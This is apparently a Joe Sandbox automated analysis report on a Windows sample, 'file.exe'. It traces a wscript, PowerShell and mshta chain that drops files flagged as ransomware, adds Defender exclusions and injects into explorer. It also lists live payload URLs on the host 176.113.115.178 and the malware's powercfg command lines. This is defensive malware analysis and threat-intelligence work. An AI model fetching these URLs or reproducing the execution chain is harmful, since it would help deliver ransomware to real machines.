              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\dialer.exeCode function: 49_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,49_2_0000000140001B54
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14E7960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,16_2_000001DCB14E7960
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies power options to not sleep / hibernate
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information211
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		211
              Scripting              		1
              Abuse Elevation Control Mechanism              		11
              Disable or Modify Tools              		1
              Credential API Hooking              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Data Obfuscation              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		LSASS Memory2
              File and Directory Discovery              		Remote Desktop Protocol1
              Email Collection              		13
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		1
              Windows Service              		1
              Access Token Manipulation              		1
              Obfuscated Files or Information              		Security Account Manager136
              System Information Discovery              		SMB/Windows Admin Shares1
              Credential API Hooking              		1
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts12
              Command and Scripting Interpreter              		Login Hook1
              Windows Service              		2
              Software Packing              		NTDS551
              Security Software Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts1
              Service Execution              		Network Logon Script712
              Process Injection              		1
              Timestomp              		LSA Secrets1
              Process Discovery              		SSHKeylogging22
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable Media3
              PowerShell              		RC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials161
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
              Rootkit              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Masquerading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt161
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd712
              Process Injection              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
              Hidden Files and Directories              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1577458 Sample: file.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 100 Antivirus detection for URL or domain 2->100 102 Antivirus / Scanner detection for submitted sample 2->102 104 Multi AV Scanner detection for submitted file 2->104 106 18 other signatures 2->106 14 file.exe 2 2->14         started        17 Mig.exe 2->17         started        20 svchost.exe 1 1 2->20         started        process3 dnsIp4 76 C:\Users\user\AppData\Local\...\tempScript.js, ASCII 14->76 dropped 78 C:\Users\user\AppData\Local\...\file.exe.log, CSV 14->78 dropped 23 wscript.exe 1 1 14->23         started        88 Multi AV Scanner detection for dropped file 17->88 90 Detected unpacking (changes PE section rights) 17->90 92 Tries to detect sandboxes and other dynamic analysis tools (window names) 17->92 94 4 other signatures 17->94 82 127.0.0.1 unknown unknown 20->82 file5 signatures6 process7 signatures8 118 Suspicious powershell command line found 23->118 120 Wscript starts Powershell (via cmd or directly) 23->120 122 Windows Scripting host queries suspicious COM object (likely to drop second stage) 23->122 124 Suspicious execution chain found 23->124 26 powershell.exe 3 19 23->26         started        30 powershell.exe 14 15 23->30         started        process9 dnsIp10 74 C:\Users\user\AppData\Roaming\CMD.vbs, ASCII 26->74 dropped 128 Potential malicious VBS script found (suspicious strings) 26->128 130 Adds a directory exclusion to Windows Defender 26->130 132 Powershell drops PE file 26->132 33 wscript.exe 1 26->33         started        36 conhost.exe 26->36         started        84 176.113.115.178, 49714, 49715, 49726 SELECTELRU Russian Federation 30->84 38 conhost.exe 30->38         started        file11 signatures12 process13 signatures14 96 Wscript starts Powershell (via cmd or directly) 33->96 98 Windows Scripting host queries suspicious COM object (likely to drop second stage) 33->98 40 cmd.exe 1 33->40         started        process15 process16 42 mshta.exe 17 40->42         started        45 conhost.exe 40->45         started        signatures17 126 Suspicious powershell command line found 42->126 47 powershell.exe 42->47         started        process18 file19 80 C:\Users\user\AppData\Roaming\LB31.exe, PE32+ 47->80 dropped 86 Adds a directory exclusion to Windows Defender 47->86 51 LB31.exe 47->51         started        55 powershell.exe 47->55         started        57 conhost.exe 47->57         started        signatures20 process21 file22 72 C:\ProgramData\Mig\Mig.exe, PE32+ 51->72 dropped 108 Multi AV Scanner detection for dropped file 51->108 110 Detected unpacking (changes PE section rights) 51->110 112 Machine Learning detection for dropped file 51->112 116 8 other signatures 51->116 59 dialer.exe 51->59         started        62 powershell.exe 51->62         started        64 cmd.exe 51->64         started        68 13 other processes 51->68 114 Loading BitLocker PowerShell Module 55->114 66 WmiPrvSE.exe 55->66         started        signatures23 process24 signatures25 134 Injects code into the Windows Explorer (explorer.exe) 59->134 136 Contains functionality to inject code into remote processes 59->136 138 Writes to foreign memory regions 59->138 142 4 other signatures 59->142 140 Loading BitLocker PowerShell Module 62->140 70 conhost.exe 62->70         started        process26

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe66%ReversingLabsWin32.Exploit.Generic
              file.exe100%AviraHEUR/AGEN.1310987
              file.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\LB31.exe100%Joe Sandbox ML
              C:\ProgramData\Mig\Mig.exe100%Joe Sandbox ML
              C:\ProgramData\Mig\Mig.exe63%ReversingLabsWin32.Ransomware.Generic
              C:\Users\user\AppData\Roaming\LB31.exe63%ReversingLabsWin32.Ransomware.Generic

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://176.113.115.178/Windows-UpdateG0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Updatenr=0%Avira URL Cloudsafe
              http://176.113.115.178/Windows0%Avira URL Cloudsafe
              http://176.113.115.178/FF/3.pngX0%Avira URL Cloudsafe
              http://176.113.115.178/FF/2.png60%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/tz0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-UpdateH0%Avira URL Cloudsafe
              http://176.113.115.178/FF/1.png100%Avira URL Cloudmalware
              http://176.113.1150%Avira URL Cloudsafe
              http://176.113.115.178/FF/3.png100%Avira URL Cloudmalware
              http://176.113.115.178/Windows-Update/80%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/eLMEMP0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/60%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update&0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/http://176.113.115.178/Windows-Update/00%Avira URL Cloudsafe
              http://176.113.115.178/FF/2.png%http://176.113.115.178/FF/3.png%$0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-UpdateQ0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/...&0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update00%Avira URL Cloudsafe
              http://176.113.115.178/FF/M.png100%Avira URL Cloudmalware
              http://176.113.115.178/FF/2.png100%Avira URL Cloudmalware
              http://176.113.115.178/Windows-Update-0%Avira URL Cloudsafe
              http://176.113.115.178/FF/1.pngX0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/...0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-UpdateWinsta00%Avira URL Cloudsafe
              http://176.113.115.178/FF/0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/C:0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/ft0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-UpdateLMEM0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/D0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update$E0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/F0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/n0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Updatei%%%%%n%%%g(0%Avira URL Cloudsafe
              http://176.113.115.178/FF/2.pngX0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/l0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-UpdateU0%Avira URL Cloudsafe
              http://176.113.115.178/FF/1.png$TC=$TC.replace(0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Updateai0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Updated.exj0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Updatemshta0%Avira URL Cloudsafe
              http://176.113.11500%Avira URL Cloudsafe
              http://176.113.115.178/FF/CMD.png100%Avira URL Cloudmalware
              http://176.113.115.1780%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update/a0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Updatee0%Avira URL Cloudsafe
              http://176.113.115.178/Windows-Update0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ax-0001.ax-msedge.net
              		150.171.27.10
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://176.113.115.178/FF/1.pngtrue
                • Avira URL Cloud: malware
                		unknown
                http://176.113.115.178/FF/3.pngtrue
                • Avira URL Cloud: malware
                		unknown
                http://176.113.115.178/FF/M.pngtrue
                • Avira URL Cloud: malware
                		unknown
                http://176.113.115.178/Windows-Update/true
                • Avira URL Cloud: safe
                		unknown
                http://176.113.115.178/FF/2.pngtrue
                • Avira URL Cloud: malware
                		unknown
                http://176.113.115.178/Windows-Updatetrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://176.113.115.178/Windows-Update/tzmshta.exe, 0000000C.00000002.2308438812.000002A6CAAF6000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://176.113.115.178/Windows-Updatenr=wscript.exe, 00000009.00000003.2252773588.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2252932375.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2252120336.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2256210413.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://176.113.115.178/FF/2.png6wscript.exe, 00000004.00000002.2192682749.000001D04750E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000011.00000002.2467005592.000001D145920000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://176.113.115wscript.exe, 00000004.00000003.2189720210.000001D049241000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.microsoft.copowershell.exe, 00000011.00000002.2467005592.000001D14593D000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000011.00000002.2446464811.000001D13D1F4000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://176.113.115.178/Windows-UpdateHwscript.exe, 00000009.00000003.2254364531.0000022C1EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2256404541.0000022C1EFE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2309103882.000002A6CAD40000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://176.113.115.178/Windows-UpdateGmshta.exe, 0000000C.00000003.2294382542.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308571523.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287051707.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://176.113.115.178/FF/3.pngXpowershell.exe, 00000007.00000002.2232422986.000001CF63B21000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://176.113.115.178/Windowswscript.exe, wscript.exe, 00000009.00000003.2254332186.0000022C20CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2254285588.0000022C20C91000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://176.113.115.178/Windows-UpdateQmshta.exe, 0000000C.00000002.2310783171.000002AED14F0000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://176.113.115.178/Windows-Update/8mshta.exe, 0000000C.00000002.2308865314.000002A6CABA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290227750.000002A6CABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://176.113.115.178/Windows-Update/http://176.113.115.178/Windows-Update/0mshta.exe, 0000000C.00000003.2298065296.000002AECCF85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2296225919.000002AECCF83000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000011.00000002.2446464811.000001D13D1F4000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2240161447.0000015F81A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276197727.000001CF72A85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF642AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276197727.000001CF72943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2859313115.0000026810074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2859313115.00000268101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2446464811.000001D13D1F4000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://176.113.115.178/Windows-Update/6mshta.exe, 0000000C.00000002.2308865314.000002A6CABA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290227750.000002A6CABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://176.113.115.178/FF/2.png%http://176.113.115.178/FF/3.png%$wscript.exe, 00000004.00000003.2188071581.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2187242940.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2194375546.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2189720210.000001D049241000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://176.113.115.178/Windows-Update/eLMEMPmshta.exe, 0000000C.00000003.2289380947.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2296588844.000002AECD0F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2310604898.000002AECD0F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287264466.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290150546.000002AECD0F7000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://176.113.115.178/Windows-Update&wscript.exe, 00000009.00000002.2255820509.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2253868783.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2254057119.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://176.113.115.178/Windows-Update/...&mshta.exe, 0000000C.00000003.2298038675.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2307546344.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308819002.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2240161447.0000015F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF628D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2349548172.000001D12D181000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://176.113.115.178/Windows-Update0wscript.exe, 00000009.00000002.2255820509.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2253868783.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2254057119.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://176.113.115.178/ff/3.pngpowershell.exe, 00000007.00000002.2296607052.000001CF7AF40000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://176.113.115.178/Windows-Update-mshta.exe, 0000000C.00000003.2294382542.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308571523.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287051707.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://176.113.115.178/FF/powershell.exe, 00000007.00000002.2232422986.000001CF6414E000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://176.113.115.178/FF/1.pngXpowershell.exe, 0000000F.00000002.2689152499.0000026800C31000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://176.113.115.178/Windows-Update/ftmshta.exe, 0000000C.00000003.2286360520.000002A6CAB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308601542.000002A6CAB14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308601542.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
